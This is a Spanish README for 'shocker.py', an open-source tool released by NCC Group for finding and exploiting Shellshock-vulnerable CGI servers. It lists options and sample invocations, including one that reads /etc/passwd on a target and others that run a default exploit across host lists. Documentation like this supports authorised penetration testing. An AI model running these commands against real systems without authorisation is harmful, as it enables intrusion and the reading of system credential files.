
Una herramienta para encontrar y explotar servidores vulnerables a Shellshock
Una herramienta para encontrar y explotar servidores vulnerables a Shellshock
Referencia: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
Publicado como código abierto por NCC Group Plc - https://www.nccgroup.trust/
Desarrollado por:
https://github.com/nccgroup/shocker
Publicado bajo AGPL, consulte LICENSE para más información
uso: shocker.py
-h, --help muestra este mensaje de ayuda y sale
--Host HOST, -H HOST Un nombre de host o dirección IP de destino
--file FILE, -f FILE Archivo que contiene una lista de objetivos
--port PORT, -p PORT El número de puerto de destino (por defecto=80)
--command COMMAND Comando a ejecutar (por defecto=/bin/uname -a)
--cgi CGI, -c CGI Único CGI a verificar (ej. /cgi-bin/test.cgi)
--proxy PROXY ACTUALMENTE UN POCO ROTO Proxy a usar en el formato 'ip:port'
--ssl, -s Usar SSL (por defecto=False)
--threads THREADS, -t THREADS Número máximo de hilos (por defecto=10, máx=100)
--verbose, -v Ser verboso en la salida
./shocker.py -H 127.0.0.1 --command "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Escanea http://127.0.0.1/cgi-bin/test.cgi y, si lo encuentra, intenta hacer cat de /etc/passwd
./shocker.py -H www.example.com -p 8001 -s
Escanea www.example.com en el puerto 8001 usando SSL para todos los scripts en cgi_list e intenta el exploit predeterminado para cualquier encontrado
./shocker.py -f ./hostlist
Escanea todos los hosts listados en el archivo ./hostlist con las opciones predeterminadas
Python 2.7+
Cambios en la versión 1.1 (Junio 2018)
Cambios en la versión 1.0 (Marzo 2016)
Cambios en la versión 0.72 (Diciembre 2014)
Cambios en la versión 0.71 (Diciembre 2014)
Cambios en la versión 0.7 (Noviembre 2014)
Cambios en la versión 0.6 (Octubre 2014)
Cambios en la versión 0.5 (Octubre 2014)
Cambios en la versión 0.4 (Octubre 2014)
Pre 0.4 (Octubre 2014)
Anthony Caulfield @ NCC por el tiempo y esfuerzo revisando versiones tempranas
Brendan Coles @ NCC por su apoyo y contribuciones